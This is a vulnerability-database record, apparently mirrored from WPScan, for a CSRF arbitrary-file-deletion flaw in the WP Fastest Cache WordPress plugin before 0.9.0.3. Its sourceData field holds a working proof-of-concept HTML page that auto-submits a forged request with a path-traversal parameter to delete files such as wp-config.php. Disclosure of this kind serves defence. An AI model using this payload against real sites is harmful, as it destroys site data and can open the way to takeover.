Description
The plugin did not perform a CSRF nonce check on the "wpfc_delete_current_page_cache" action, allowing CSRF attacks that cause an authenticated user's browser to delete arbitrary files, including the wp-config.php file.
{"id": "WPEX-ID:1FB5A8A0-4769-4E1A-9119-A63AFD9364CC", "type": "wpexploit", "bulletinFamily": "exploit", "title": "WP Fastest Cache < 0.9.0.3 - Cross-Site Request Forgery (CSRF) Arbitrary File Deletion", "description": "The plugin did not have a CSRF nonce check on the \"wpfc_delete_current_page_cache\" action, allowing CSRF attacks against authenticated users to delete arbitrary files, including the wp-config.php file.\n", "published": "2020-02-05T00:00:00", "modified": "2020-03-10T06:00:05", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "wpvulndb", "references": ["https://wearetradecraft.com/advisories/tc-2020-0001/", "https://plugins.trac.wordpress.org/changeset/2235160/wp-fastest-cache"], "cvelist": [], "lastseen": "2021-02-15T22:33:27", "viewCount": 2, "enchantments": {"dependencies": {}, "score": {"value": 1.4, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 1.4}, "sourceData": " <html>\r\n <head></head>\r\n <body>\r\n <form id=\"form\" action=\"https://example.com/wp-admin/admin-ajax.php?path=/../../../..\" method=\"post\">\r\n <input type=\"hidden\" name=\"action\" value=\"wpfc_delete_current_page_cache\"/>\r\n </form>\r\n <script>document.form.submit();</script>\r\n </body>\r\n </html>", "generation": 1, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645805454, "score": 1659842276, "epss": 1679062491}, "_internal": {"score_hash": "e93796c64ff3dca6220344b94706062d"}}
{}